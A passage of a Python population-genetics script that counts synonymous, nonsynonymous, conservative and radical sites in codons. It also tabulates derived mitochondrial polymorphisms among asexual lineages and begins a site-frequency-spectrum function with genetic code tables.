T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):
"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
totalSynSites = 0.0
totalNonsynSites = 0.0
totalC1Sites = 0.0
totalR1Sites = 0.0
totalC2Sites = 0.0
totalR2Sites = 0.0
totalC3Sites = 0.0
totalR3Sites = 0.0
totalC4Sites = 0.0
totalR4Sites = 0.0
totalC5Sites = 0.0
totalR5Sites = 0.0
totalC6Sites = 0.0
totalR6Sites = 0.0
totalC7Sites = 0.0
totalR7Sites = 0.0
totalMeanCSites = 0.0
totalMeanRSites = 0.0
codonNum = 0
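# For each codon, enumerate all nine single-nucleotide mutants, translate them,
# and count how many changes are synonymous vs. nonsynonymous and, for the
# nonsynonymous ones, conservative vs. radical under each scheme. Dividing each
# codon's counts by 3 converts mutant counts into per-codon site counts,
# analogous to Nei & Gojobori (1986)-style site counting (an interpretation of
# the code; no citation is given in the source).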
otherBases = {'A': 'CGT', 'C': 'AGT', 'G': 'ACT', 'T': 'ACG'} # alternatives to each base, in alphabetical order
for codon in codonList:
    if 'N' in codon or '-' in codon:
        # Ambiguous or gapped codon: add precomputed average per-codon site
        # counts instead of counting from the codon itself.
        totalSynSites += 0.729166667
        totalNonsynSites += 2.270833333
        totalC1Sites += 1.395833333
        totalR1Sites += 0.875
        totalC2Sites += 1.270833333
        totalR2Sites += 1.0
        totalC3Sites += 0.708333333
        totalR3Sites += 1.5625
        totalC4Sites += 0.895833333
        totalR4Sites += 1.375
        totalC5Sites += 1.0625
        totalR5Sites += 1.208333333
        totalC6Sites += 0.854166667
        totalR6Sites += 1.416666667
        totalC7Sites += 0.8125
        totalR7Sites += 1.458333333
        totalMeanCSites += 1.0
        totalMeanRSites += 1.270833333
    else:
        currS = currN = 0.0
        currC1 = currC2 = currC3 = currC4 = currC5 = currC6 = currC7 = 0.0
        currR1 = currR2 = currR3 = currR4 = currR5 = currR6 = currR7 = 0.0
        currMeanC = currMeanR = 0.0
        site1 = codon[0]
        site2 = codon[1]
        site3 = codon[2]
        # All nine single-nucleotide mutants of this codon, in the same order
        # as the original unrolled if/elif blocks. Codons are assumed to
        # contain only A/C/G/T once 'N'- and gap-containing codons have been
        # filtered out above.
        mutList = ([b + site2 + site3 for b in otherBases[site1]]
                   + [site1 + b + site3 for b in otherBases[site2]]
                   + [site1 + site2 + b for b in otherBases[site3]])
        if codonNum == 0:
            # First codon of the gene: alternative start codons translate to 'M'.
            if codon in startCodons:
                currAA = 'M'
            else:
                currAA = geneticCode[codon]
            aaList = ['M' if mut in startCodons else geneticCode[mut] for mut in mutList]
        else:
            currAA = geneticCode[codon]
            aaList = [geneticCode[mut] for mut in mutList]
        for aa in aaList:
            if aa == currAA:
                currS += 1.0
            else:
                currN += 1.0
                # Score the replacement as conservative ('C') or radical ('R')
                # under each of the seven schemes, and under the mean
                # conservative/radical index returned by CRI() (defined or
                # imported elsewhere in this script), thresholded at 0.5.
                conRad1 = aaSchemeDict1[(currAA,aa)]
                conRad2 = aaSchemeDict2[(currAA,aa)]
                conRad3 = aaSchemeDict3[(currAA,aa)]
                conRad4 = aaSchemeDict4[(currAA,aa)]
                conRad5 = aaSchemeDict5[(currAA,aa)]
                conRad6 = aaSchemeDict6[(currAA,aa)]
                conRad7 = aaSchemeDict7[(currAA,aa)]
                meanConRad = CRI([currAA,aa])
                if meanConRad[7] > 0.5:
                    meanConRad = 'R'
                else:
                    meanConRad = 'C'
                if conRad1 == 'R':
                    currR1 += 1
                else:
                    currC1 += 1
                if conRad2 == 'R':
                    currR2 += 1
                else:
                    currC2 += 1
                if conRad3 == 'R':
                    currR3 += 1
                else:
                    currC3 += 1
                if conRad4 == 'R':
                    currR4 += 1
                else:
                    currC4 += 1
                if conRad5 == 'R':
                    currR5 += 1
                else:
                    currC5 += 1
                if conRad6 == 'R':
                    currR6 += 1
                else:
                    currC6 += 1
                if conRad7 == 'R':
                    currR7 += 1
                else:
                    currC7 += 1
                if meanConRad == 'R':
                    currMeanR += 1
                else:
                    currMeanC += 1
        # Nine mutants per codon; dividing by 3.0 converts mutant counts into
        # site counts (0-3 per codon).
        currS /= 3.0
        currN /= 3.0
        currC1 /= 3.0
        currC2 /= 3.0
        currC3 /= 3.0
        currC4 /= 3.0
        currC5 /= 3.0
        currC6 /= 3.0
        currC7 /= 3.0
        currMeanC /= 3.0
        currR1 /= 3.0
        currR2 /= 3.0
        currR3 /= 3.0
        currR4 /= 3.0
        currR5 /= 3.0
        currR6 /= 3.0
        currR7 /= 3.0
        currMeanR /= 3.0
        totalSynSites += currS
        totalNonsynSites += currN
        totalC1Sites += currC1
        totalR1Sites += currR1
        totalC2Sites += currC2
        totalR2Sites += currR2
        totalC3Sites += currC3
        totalR3Sites += currR3
        totalC4Sites += currC4
        totalR4Sites += currR4
        totalC5Sites += currC5
        totalR5Sites += currR5
        totalC6Sites += currC6
        totalR6Sites += currR6
        totalC7Sites += currC7
        totalR7Sites += currR7
        totalMeanCSites += currMeanC
        totalMeanRSites += currMeanR
    codonNum += 1
return [totalSynSites,totalNonsynSites,totalMeanCSites,totalMeanRSites,totalC1Sites,totalR1Sites,totalC2Sites,totalR2Sites,totalC3Sites,totalR3Sites,totalC4Sites,totalR4Sites,totalC5Sites,totalR5Sites,totalC6Sites,totalR6Sites,totalC7Sites,totalR7Sites]
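# mapChanges: tabulates putatively derived polymorphisms among the asexual
# lineages ('$'-tagged sequences without a '*'), polarizing each allele
# against the single outgroup sequence; the last output column ('P. est') is
# the outgroup nucleotide. Hypothetical usage (file name is illustrative only):
#   mapChanges('alignment.fasta')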
def mapChanges(fasta):
#cladeDict = {'A': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56', '>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237', '>$*Ianthe', '>$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309', '>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36', '>$WalesC', '>$Brunner_2_4n'], 'B': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36', '>$WalesC', '>$Brunner_2_4n'], 'C': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36', '>$WalesC'], 'D': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36'], 'E': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid'], 'F': ['>$Waik37', '>$Waik372', '>$Tarawera'], 'G': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56', '>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237', '>$*Ianthe', '>$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309'], 'H': ['>$*Ianthe', '>$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309'], 'I': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56', '>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237'], 'J': ['>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237'], 'K': ['>$clone_7', '>$DenmarkA', '>$Duluth'], 'L': ['>$clone_7', '>$DenmarkA'], 'M': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56'], 'N': ['>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56'], 'O': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n'], 'P': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n'], 'Q': ['>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n'], 'R': ['>$*Lady', '>$Grasmere_1_4n'], 'S': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn'], 'T': ['>$McGregor', '>$Poerua_72_4n', '>$Gunn'], 'U': ['>$McGregor', '>$Poerua_72_4n'], 'V': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n'], 'W': ['>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid'], 'X': ['>$AC51', 
'>$Heron_mitochondrion', '>$Grasmere_6_3n'], 'Y': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n'], 'Z': ['>$Heron2', '>$clone_1']}
    positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}, half-open intervals
    seqDict, seqList, codonDict = buildCodonDict(fasta)
    cladeList = ['H','L','R','U','Z','F','K','N','Q','T','Y','X','E','J','W','D','C','B','V','S','P','O','M','I','G','A']
    popList = []
    sexList = []
    outList = []
    asexList = []
    # '$' marks population sequences, '*' marks sexual lineages; everything
    # else is treated as outgroup.
    for seq in seqList:
        if '$' in seq:
            popList.append(seq)
            if '*' in seq:
                sexList.append(seq)
            else:
                asexList.append(seq)
        else:
            outList.append(seq)
    outSeq = seqDict[outList[0]]
    sys.stdout.write('Asex Polymorphisms\nGene\tSite\tCodon\tLineages w/ Derived Allele\t# Individuals w/ derived allele\tAlleles\tP. est\n')
    i = 0
    # Scan every alignment column, look up its gene, and collect the alleles
    # carried by the asexual lineages at that column.
    while i < len(seqDict[seqList[0]]):
        outNuc = outSeq[i]
        gene = False
        for locus in positionDict:
            start = locus[0]
            stop = locus[1]
            if start <= i < stop: # half-open: 'stop' is the next gene's start
                gene = positionDict[locus]
        currAlleleDict = {}
        currAlleleList = []
        for seq in asexList:
            currSeq = seqDict[seq]
            currNuc = currSeq[i]
            if currNuc not in currAlleleDict and 'N' != currNuc and '-' != currNuc:
                currAlleleDict[currNuc] = [seq]
                currAlleleList.append(currNuc)
            elif 'N' != currNuc and '-' != currNuc:
                currList = currAlleleDict[currNuc]
                currList.append(seq)
                currAlleleDict[currNuc] = currList
        if len(currAlleleDict) > 1:
            for nuc in currAlleleList:
                if nuc != outNuc:
                    #currCladeList = cladeList
                    currList = currAlleleDict[nuc]
                    '''for group in cladeList:
compClade = cladeDict[group]
removeClade = False
for lineage in currList:
if lineage not in compClade:
removeClade = True
if removeClade == True:
currCladeList.remove(group)
print currCladeList
if len(currAlleleDict[nuc]) > 1:
sys.stdout.write(gene + '\t' + str(i + 1) + '\t' + str((i*3)+1) + '\t' + str(currAlleleDict[nuc]) + '\t' + str(len(currAlleleDict[nuc])) + '\t' + str(currAlleleList) + '\t' + outNuc + '\n')
else:'''
                    sys.stdout.write(gene + '\t' + str(i + 1) + '\t' + str((i/3)+1) + '\t' + str(currAlleleDict[nuc]) + '\t' + str(len(currAlleleDict[nuc])) + '\t' + str(currAlleleList) + '\t' + outNuc + '\n') # (i/3)+1 = 1-based codon number
        i += 1
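# foldedSFS: builds a folded site-frequency-spectrum table over biallelic
# nucleotide sites among the asexual lineages. 'Folded' here means sites are
# summarized by minor-allele count rather than polarized against an outgroup.
# Hypothetical usage (file name is illustrative only):
#   foldedSFS('alignment.fasta', code='invertebrateMt')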
def foldedSFS(fasta,code='invertebrateMt'):
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 
'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 